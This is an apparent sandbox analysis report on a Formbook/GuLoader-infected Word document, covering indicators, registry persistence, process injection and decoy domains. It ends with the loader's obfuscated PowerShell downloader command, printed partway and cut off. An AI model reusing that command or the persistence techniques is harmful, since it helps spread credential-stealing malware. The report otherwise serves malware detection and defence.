formbook | 4b8f8f705246d7d980911042c089e9a9fb450031d5dde069add5f4a207c32dc4

Analysis

max time kernel
146s
max time network
123s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
05-07-2024 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quo2024.docx
Size

16KB
MD5

3fbe5c0fdd008937310bc6c9dba29c2d
SHA1

c4fbc0de50070bae54fdabb458260f8d2878a117
SHA256

4b8f8f705246d7d980911042c089e9a9fb450031d5dde069add5f4a207c32dc4
SHA512

427800453db7bc6203a6b9166aa73c5a4a15af2b634eb41bcee65d85cbee212c517df431517f929684ef369a818ef170414455b56a2dbbc4cd656ac2f338b333
SSDEEP

384:gyXhR4pW0s8PL8wi4OEwH8TIbE91r2fRAJYjviedmPkGf:gch8L5P3DOqnYJOqvzdmPka

Score

10^/10

formbook guloader dd01 downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

dd01

Decoy

1prostitutki-chelyabinska.com

o2v7c.rest

something-organized.com

etc99.store

perksaccess.contact

consuyt.xyz

dscmodelpapers.com

dana88.lat

dumange.com

pointlomabarreboutique.com

djtmaga.net

dentisttanger.com

17251604.com

dogcatshoponline.com

eppgrandeur.com

jyty3500.com

felixkang.asia

xn--22ck2ci1dl0f7b7h.com

milliesrecruitment.com

www333804000.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Formbook payload 1 IoCs
rat

Processes:

resource yara_rule

behavioral1/memory/2800-191-0x0000000000070000-0x000000000009F000-memory.dmp formbook

resource	yara_rule
behavioral1/memory/2800-191-0x0000000000070000-0x000000000009F000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

cscript.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\HJ8PYLT0O6UT = "C:\\Program Files (x86)\\windows mail\\wab.exe"	cscript.exe
Key created	\Registry\User\S-1-5-21-2721934792-624042501-2768869379-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	cscript.exe

Blocklisted process makes network request 3 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

11 2824 EQNEDT32.EXE
13 1668 WScript.exe
15 924 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
11	2824	EQNEDT32.EXE
13	1668	WScript.exe
15	924	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2884 wab.exe
2884 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1276 powershell.exe
2884 wab.exe

pid	process
2884	wab.exe
2884	wab.exe

pid	process
1276	powershell.exe
2884	wab.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exewab.execscript.exe

description	pid	process	target process
PID 1276 set thread context of 2884	1276	powershell.exe	wab.exe
PID 2884 set thread context of 1196	2884	wab.exe	Explorer.EXE
PID 2800 set thread context of 1196	2800	cscript.exe	Explorer.EXE

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2824 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2824	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXEcscript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\Registry\User\S-1-5-21-2721934792-624042501-2768869379-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	cscript.exe
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2360 WINWORD.EXE

pid	process
2360	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exewab.execscript.exe

pid	process
924	powershell.exe
1276	powershell.exe
1276	powershell.exe
2884	wab.exe
2884	wab.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exewab.execscript.exe

pid process

1276 powershell.exe
2884 wab.exe
2884 wab.exe
2884 wab.exe
2800 cscript.exe
2800 cscript.exe
2800 cscript.exe
2800 cscript.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exewab.execscript.exe

description pid process

Token: SeDebugPrivilege 924 powershell.exe
Token: SeDebugPrivilege 1276 powershell.exe
Token: SeDebugPrivilege 2884 wab.exe
Token: SeDebugPrivilege 2800 cscript.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2360 WINWORD.EXE
2360 WINWORD.EXE

pid	process
1276	powershell.exe
2884	wab.exe
2884	wab.exe
2884	wab.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe
2800	cscript.exe

description	pid	process
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	2884	wab.exe
Token: SeDebugPrivilege	2800	cscript.exe

pid	process
2360	WINWORD.EXE
2360	WINWORD.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEpowershell.exeExplorer.EXEcscript.exe

description	pid	process	target process
PID 2824 wrote to memory of 1668	2824	EQNEDT32.EXE	WScript.exe
PID 2824 wrote to memory of 1668	2824	EQNEDT32.EXE	WScript.exe
PID 2824 wrote to memory of 1668	2824	EQNEDT32.EXE	WScript.exe
PID 2824 wrote to memory of 1668	2824	EQNEDT32.EXE	WScript.exe
PID 1668 wrote to memory of 924	1668	WScript.exe	powershell.exe
PID 1668 wrote to memory of 924	1668	WScript.exe	powershell.exe
PID 1668 wrote to memory of 924	1668	WScript.exe	powershell.exe
PID 1668 wrote to memory of 924	1668	WScript.exe	powershell.exe
PID 924 wrote to memory of 2132	924	powershell.exe	cmd.exe
PID 924 wrote to memory of 2132	924	powershell.exe	cmd.exe
PID 924 wrote to memory of 2132	924	powershell.exe	cmd.exe
PID 924 wrote to memory of 2132	924	powershell.exe	cmd.exe
PID 2360 wrote to memory of 1552	2360	WINWORD.EXE	splwow64.exe
PID 2360 wrote to memory of 1552	2360	WINWORD.EXE	splwow64.exe
PID 2360 wrote to memory of 1552	2360	WINWORD.EXE	splwow64.exe
PID 2360 wrote to memory of 1552	2360	WINWORD.EXE	splwow64.exe
PID 924 wrote to memory of 1276	924	powershell.exe	powershell.exe
PID 924 wrote to memory of 1276	924	powershell.exe	powershell.exe
PID 924 wrote to memory of 1276	924	powershell.exe	powershell.exe
PID 924 wrote to memory of 1276	924	powershell.exe	powershell.exe
PID 1276 wrote to memory of 2228	1276	powershell.exe	cmd.exe
PID 1276 wrote to memory of 2228	1276	powershell.exe	cmd.exe
PID 1276 wrote to memory of 2228	1276	powershell.exe	cmd.exe
PID 1276 wrote to memory of 2228	1276	powershell.exe	cmd.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1276 wrote to memory of 2884	1276	powershell.exe	wab.exe
PID 1196 wrote to memory of 2800	1196	Explorer.EXE	cscript.exe
PID 1196 wrote to memory of 2800	1196	Explorer.EXE	cscript.exe
PID 1196 wrote to memory of 2800	1196	Explorer.EXE	cscript.exe
PID 1196 wrote to memory of 2800	1196	Explorer.EXE	cscript.exe
PID 2800 wrote to memory of 2924	2800	cscript.exe	Firefox.exe
PID 2800 wrote to memory of 2924	2800	cscript.exe	Firefox.exe
PID 2800 wrote to memory of 2924	2800	cscript.exe	Firefox.exe
PID 2800 wrote to memory of 2924	2800	cscript.exe	Firefox.exe
PID 2800 wrote to memory of 2924	2800	cscript.exe	Firefox.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quo2024.docx"
2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2360

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
3⤵
PID:1552

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:2924

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\datti38291.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Azido116 Melamdim Exigenter pinsedagene herles Holderen Reimages trialogue Gazebo Knalde Idealistiske Kammerjgerens Vskens Marbleizer Nonpolarizables populus Ublufrdigheds Wuchereria Cosecants Bullsnake Overstretched Hellhound Blaabrs Tidslerne Azido116 Melamdim Exigenter pinsedagene herles Holderen Reimages trialogue Gazebo Knalde Idealistiske Kammerjgerens Vskens Marbleizer Nonpolarizables populus Ublufrdigheds Wuchereria Cosecants Bullsnake Overstretched Hellhound Blaabrs Tidslerne';If (${host}.CurrentCulture) {$Signetringe++;}Function Gadsman($Unbeliever166){$Faunaerne=$Unbeliever166.Length-$Signetringe;$Nummerordenens='SUBsTR';$Nummerordenens+='ing';For( $Pachouli207=4;$Pachouli207 -lt $Faunaerne;$Pachouli207+=5){$Azido116+=$Unbeliever166.$Nummerordenens.Invoke( $Pachouli207, $Signetringe);}$Azido116;}function Witnesses($Noncontinuable){ .($Anlgstjenesten) ($Noncontinuable);}$Snaksomst=Gadsman 'f,skM SeaoBemozRi,liPe,nlReg l,agga.equ/Obse5 Kro.Koe.0Back Eft( ialWKo pi fl.nCon,d.kisoCommwm,sts.iur No.pN entT ,ie Pur,1Maxi0 ili. Mal0Pect;Rimt ko,oW NgtiStranAabe6Dict4Rest;Kont PerixLama6 Sno4Gaar;,eto Til.rEle.vNrhe:Brid1 Neg2Ford1Vind.Ha v0fors)Men. Ci.cG MaseStracEndeklighoYn.e/Un,a2 Lea0Br,c1 For0 M n0tan,1 jer0A ti1 Alv SchiFHns.iTurnrK ateBli fThiroTolsxAsta/ Tar1tvan2Edic1Ur n.Pant0Pul, ';$Helonin=Gadsman 'For.UClocsTraueBolsrAn.r-Tv,nAUnprg F.yeA ganGigatvikk ';$herles=Gadsman 'trofhMi rtS gmt PhrpBobbsInco: D k/Fore/Be lwGerepintesNyk eCon gUlotuCalar MccoSk.ds His.Ren,cAloeoIdeamkana. Ca.uF,niylust/UnmaPBre rGueraTrehlRacee NeurN phiGenaeModnt JebsBypl.AmphcCau,uDiscrExst ';$Redefulde=Gadsman 'Apac>Flas ';$Anlgstjenesten=Gadsman 'Kaffi.rune.evexUdra ';$Stiftamtmandens='trialogue';$Unhatting = Gadsman 'Ru peAlbucUnplhE.spoInds Subs%DyspaUskopPi,epOperdOpbla ivttRensa.riv%Embr\ S.uFErgoa ArtsFacet Ethl,eraa SavnCan dBruts ,apkI telG,noi Julm BesaKim eU,vir Sa .SilkV kruo BellSta. Bjer&Part&,iet Ko re BetcFormhFortoF,li FiretVaso ';Witnesses (Gadsman '.nsu$ 